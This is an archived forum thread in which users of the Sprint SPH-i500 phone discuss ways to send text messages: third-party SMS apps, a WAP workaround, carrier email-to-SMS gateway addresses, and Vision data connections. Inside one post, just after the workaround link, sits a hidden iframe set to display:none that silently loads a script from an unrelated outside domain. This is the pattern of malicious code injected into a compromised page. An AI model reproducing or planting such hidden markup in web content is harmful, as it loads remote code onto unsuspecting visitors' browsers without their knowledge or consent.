How to send Mobile Originated SMS (MO-SMS) from SPH-i500

Okay, I was wondering if anyone had found a 3rd party app to do this yet? As most of you know, SprintPCS does not have the capability of making MO-SMS. In order to do this on other Sprint PalmOS smartphones like the Treo300, you had to purchase an app like pdaapps's Treo300SMS. Does anyone know if Trep300SMS will work on the SPH-i500? And if not, does anyone know if PDAapps is working on a version for the SPH?

Also for all those interested, here is a temporary workaround: Point the blazer browser to:

http://wap.sprintusers.com/wap/tm/

You can use that site to send text messages to other phones...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Scott's free program seems to be working, but I haven't verified whether it works across networks.

PDA Apps is indeed working on an i500SMS program - I emailed them and got the following response: "We are working on a SMS program for the I500. Stay tuned, we will drop you a note when the program is available. PDA Apps support"

COOL!!!!!!!!! And it doesn't use any external proxies like PDAapps?! Wow, that pretty cool! Am I correct in assuming this willwork on other OS 3.5 smartphones like the Treo 300 as well?! Thanks!

Well, I just tried sending a text message to my wife's phone (she's on TMobile) and I get the following error message: The message recipient does not subscribe to the Sprint PCS messaging service."

If the free app only works on Sprint, it's pretty much useless for me.

Ok, maybe I'm clueless so enlighten me. The i500 does accept a short message by using phone#@messaging.sprintpcs.com. So the problem is sending one out. With an email program can't you then send a short message to phonenum@anysms.com.
Obviously fill in anysms with the phone you want to send to. Why isn't this acceptable or is there another issue I'm missing?

There are two problems with this:

1) You have to be connected to Vision to send an email. This is slow and possibly expensive depending on your plan, and you can't receive phone calls while you are connected.

2) When someone sends an SMS to you, it arrives as a shortmail, not a text message. There is no good way to read your shortmail, since you can't access Sprint's WAP pages with your I500.

I understand (pray?) that I500SMS will allow me to send an SMS without being connected, and to receive SMS's as 1-way text notifications.

You can't send a callback number with the email gateway-- so if I send a message to my friend, he can't just hit the call button and talk, and the message doesn't get filed correctly.

Also, the problem with receiving via shortmail mentioned above...

I can appreciate why an SMS program is a better option then my suggestion but I do have a few rebuttals and a question.

1. I'm using snappermail and sending receiving is fairly quick. My plan is $10 unlimited time and data so I'm not worried about charges.

Q. You said you can't receive a call while on vision. I know you can't use vision while on a call but the call comes through. If I take the call then vision disconnects. That is what I thought happened. I'm going to test it tonight. Maybe you are saying the same think but I read it to mean no calls (rings) coming in while on vision. So unless I am sending something at the moment of a call I'll disconnect and then return to vision after the call.

2. When I received the short message I was able to read it on the screen. If a message goes to my sprint email it says to logon to check it. With SMS I can view it immediately.

The above reasons are why I don't see SMS as a big problem even though a dedicated program might improve the experience slightly.

1) You have to be connected to vision to send email or sms on Sprint. Since Sprint does not provide a true MO-SMS, everything is essentially through the data network. Also, unless you have a free and clear plan, vision should be unlimited for most SPH users.

2) Are you sure about that? If someone sends a message to mynumber@messaging.sprintpcs.com, I get a text message on my Treo 300? I don't have to access any site to read it...

3) Like I said above, you have to be connected to vision to use an app like Treo300SMS and probably I500SMS. This usually isn't a problem b/c you just keep vision connected 24/7 unless you experience problems like turbo drain. However, I haven't heard if any i5 users have expereiced that problem as of yet. If you're paying more $50/month and you have a free and clear plan, then you should really consider switching to a free and clear plan w/vision. It's truely worth it...

That's true if someone sends an e-mail to yournumber@messaging.sprintpcs.com; but if someone sends you an SMS it goes only to your shortmail inbox.

If you are connected to Vision 24/7, how do you make and receive phone calls?

Okay, I think we're talking past each other a little bit here. First of all, Sprint does not have any type of mobile originated SMS functionality period. Unlike Sprint, most other wireless providers (gsm etc) have a completely separate system which handle SMS send, traffic, forwarding, response etc. This system is totally separate from the voice or wireless data (gprs) systems of the provider. Thus you never have to log on to data to send a SMS. Sprint (stupidly) does not offer anything like this. Having said that, when you send a SMS, you're esentially sending it to a mobile email address. For example, if you want to send a SMS to a Tmo phone from your email client, you would send it to TMobile_number@tmomail.net. Below are all the sms email address of various carriers:

Alltel: @alltelmessage.com

AT&T: @mobile.att.net

Cellular One: @mycellone.net

Cellular One [Amarillo, TX customers]: @wwtext.net

Cingular: @mobile.mycingular.com

HickoryTech: @sms.hickorytech.com

Fido: @fido.ca

Nextel: @messaging.nextel.com

Qwest Wireless: @qwestmp.com

Sprint PCS: @messaging.sprintpcs.com

SureWest: @mobile.surewest.com

T-Mobile: @tmomail.net

Telus Mobility: @msg.telus.com

Verizon Wireless: @vtext.com

What sprint has is something called short mail and one-way text messaging. For short mail, you phone has to be connectted to vision (i.e data capable) in order to send/receive messages. On older 2G phones, you have to log on to Sprint's WAP portal to send/receive messagess. Text messaging is just one-way and is meant to be sent from the SprintPCS messaging site only! With text messaging, the receiving mobile must be data capable as well. Thus both methods utilize vision (1xrtt) regardless. The interesting thing is what apps like Treo300SMS can do on palmOS smartphones. With Treo300SMS, I can send/receive both shortmail and text messages from my treo, not just the website. For example if I receive a short mail message from another sprint mobile, Treo300SMS automatically registers the presence of the mail, activates the retrieval program whereby the SMS app logs onto vision, downloads the short mail and presents it in a sms popup window on my screen. You can than either reply to the short mail, call back the sender, or delete the message. Thus Treo300SMS integrates SMS-like functionality to short mail. If someone sends you a text message from either the SprintPCS messaging site or by sending an message to xxx-xxx-xxxx@messaging.sprintpcs.com, the message is directly sent to your mobile without having to log onto vision. However, if you want to reply, Treo300SMS has to log onto vision where it sends the text message through its proxy to the Sprint servers. This logging on/off vision usually isn't a problem if you just keep your vision connected 24/7. This does not mean you wil miss calls though (at least on the Treo). While using an active vision connection (green arrows), the treo will give you the option of answering the call or ignoring (unless you're out of coverage) where it then goes to the voicemail. Otherwise while in a state of non-active vision (grey arrows), the treo answers normally. Thus AFAIK, you don't miss calls while on vision. That's why you can keep vision connected 24/7...

Anyway, that's how Treo300SMS works and I presume this is how i500SMS should work in the future once PDAapps releases it. I hope I didn't confuse anybody and if I stated something incorrectly, please let me know...

Also, below is a nice article describing how to use inter-carrier SMS in NA:

OK, just a couple of points:

1) Although you obviously need an appropriate phone, you don't need to be connected to Vision to receive a 1-way text message.

2) The I500 redirects calls straight to voice mail when you're connected to Vision. If you're lucky. Otherwise, you miss the call altogether, and the caller gets an earful of electronic noise.

No, but your mobile must be data-capable. And you must connect to vision in order to respond using the PDAapps program...

Well like I said, I get a popup message which ask's me if I want to answer. I admit though, this feature is not full proof and many other treo users don't report this workng for them...but it works for me. I don't know why this doesn't occur with the i5...

Partially true.. You can receive calls when there isn't a data transaction happening. I leave my phone logged into vision all day and don't have any problems receiving calls, but if I'm actively browsing the web (or downloading email/etc) then it goes to voicemail.

Prompted by diomark, I tried this out, and in fact I can receive a call while connected as long as I am not actively sending or receiving data. So, I was largely wrong about that part.

Now, let's say that your friend on T-Mobile sends you an SMS. It arrives as shortmail, and a notification pops up on your screen saying that you need to check your shortmail. Now what do you do?

When I was using my n400, I could get to my shortmail relatively directly via Sprint's WAP pages, a few key presses and maybe 30 seconds. With my I500, I have to navigate sprintpcs.com's heavyweight non-WAP pages, login and all, more like two minutes. Am I missing something?
